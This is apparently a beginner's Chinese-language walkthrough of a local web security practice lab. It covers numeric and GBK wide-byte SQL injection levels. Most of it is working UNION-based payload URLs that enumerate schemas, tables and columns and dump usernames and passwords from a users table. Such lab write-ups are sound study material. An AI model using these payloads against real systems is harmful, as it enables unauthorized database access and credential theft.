被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程
SQL注入漏洞
01-数字型注入
http://localhost:32774/sqli/01.php?id=1'
发现有报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1
猜测语句
WHERE id=$id LIMIT 0,1
验证一下
查列数
查显示位
爆库
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+
爆表
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
爆列
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=database()%20and%20table_name=%27users%27)%20--+
爆数据
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--+
02-字符型注入
http://localhost:32774/sqli/02.php?id=1' or '1=2–'
报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’ or ’1=2–’’ LIMIT 0,1’ at line 1
看源码,发现SET NAMES gbk猜测宽字节注入
尝试
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,3 --+
爆库
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
爆表
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
爆数据
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+